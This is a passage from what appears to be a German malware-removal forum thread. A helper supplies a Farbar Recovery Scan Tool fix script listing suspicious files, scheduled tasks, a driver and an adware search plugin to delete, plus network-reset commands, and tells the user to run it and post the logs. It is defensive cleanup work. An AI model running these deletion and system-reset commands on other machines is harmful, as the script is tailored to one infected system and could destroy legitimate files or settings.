C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\7vfacfnw.default\searchplugins\AdTrustMediaSafeSearch.xml [2019-03-15] S1 asrdmon; C:\WINDOWS\system32\drivers\asrdmon.sys [18024 2019-03-15] (Advance System Care, Inc. -> ) C:\WINDOWS\system32\drivers\asrdmon.sys 2019-03-09 11:50 - 2019-03-09 11:50 - 001880576 _____ C:\WINDOWS\NjY2MjY3YWM.exe 2019-03-09 11:50 - 2019-03-09 11:50 - 000111036 _____ C:\WINDOWS\uninstaller.dat 2019-03-09 22:48 - 2019-03-09 22:48 - 000000000 ____D C:\ProgramData\SecuritySuite 2019-03-09 22:22 - 2019-03-09 22:22 - 006161408 _____ C:\Users\User\AppData\Local\dump007.dat 2019-03-09 22:22 - 2019-03-09 22:22 - 000003638 _____ C:\WINDOWS\System32\Tasks\ovlygkmnsiq 2019-03-09 22:22 - 2019-03-09 22:22 - 000003446 _____ C:\WINDOWS\System32\Tasks\ikujelamnie 2019-03-09 22:22 - 2019-03-09 22:22 - 000000012 _____ C:\Users\User\setup_01.ini 2019-03-09 22:22 - 2019-03-09 22:22 - 000000009 _____ C:\Users\User\rstr4.ini 2019-03-09 16:52 - 2019-03-15 11:43 - 000000000 ____D C:\WINDOWS\SysWOW64\SSL 2019-03-09 16:52 - 2019-03-09 22:24 - 000000306 __RSH C:\Users\User\ntuser.pol 2019-03-09 16:52 - 2019-03-09 16:52 - 000003690 _____ C:\WINDOWS\System32\Tasks\{59DA57C1-8435-158F-DF1A-AE6858D6E74C} 2019-03-09 16:52 - 2019-03-09 16:52 - 000003482 _____ C:\WINDOWS\System32\Tasks\{7BBA84D2-5B4E-36CE-48B3-D11A36A979FF} 2019-03-09 16:52 - 2019-03-09 16:52 - 000000903 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Manager.lnk 2019-03-09 16:52 - 2019-03-09 16:52 - 000000306 __RSH C:\ProgramData\ntuser.pol 2019-03-09 16:52 - 2019-03-09 16:52 - 000000003 _____ C:\Users\User\AppData\Local\wbem.ini Unlock: C:\Users\User\LegEoyOX.exe C:\Users\User\LegEoyOX.exe Unlock: C:\Users\User\AppData\Local\EULhyy.exe C:\Users\User\AppData\Local\EULhyy.exe 2018-01-06 01:30 - 2018-01-06 01:30 - 000000124 _____ () C:\Users\User\AppData\Local\uts.ini 2019-03-09 16:52 - 2019-03-09 16:52 - 000000003 _____ () C:\Users\User\AppData\Local\wbem.ini VirusTotal: C:\WINDOWS\SysWOW64\setup.exe VirusTotal: C:\WINDOWS\SysWOW64\InstallShield\setup.exe testsigning: ==> 'testsigning' ist aktiviert. Prüfung auf eventuelle nicht-signierte Treiber durchführen <==== ACHTUNG ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions CMD: ipconfig /flushdns CMD: netsh winsock reset CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: Bitsadmin /Reset /Allusers Hosts: RemoveProxy: EmptyTemp: End::
Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Schritt 2

Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
Poste mir beide Logdateien mit deiner nächsten Antwort.

Bitte poste mit deiner nächsten Antwort

die Logdatei des FRST-Fix (fixlog.txt),
die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).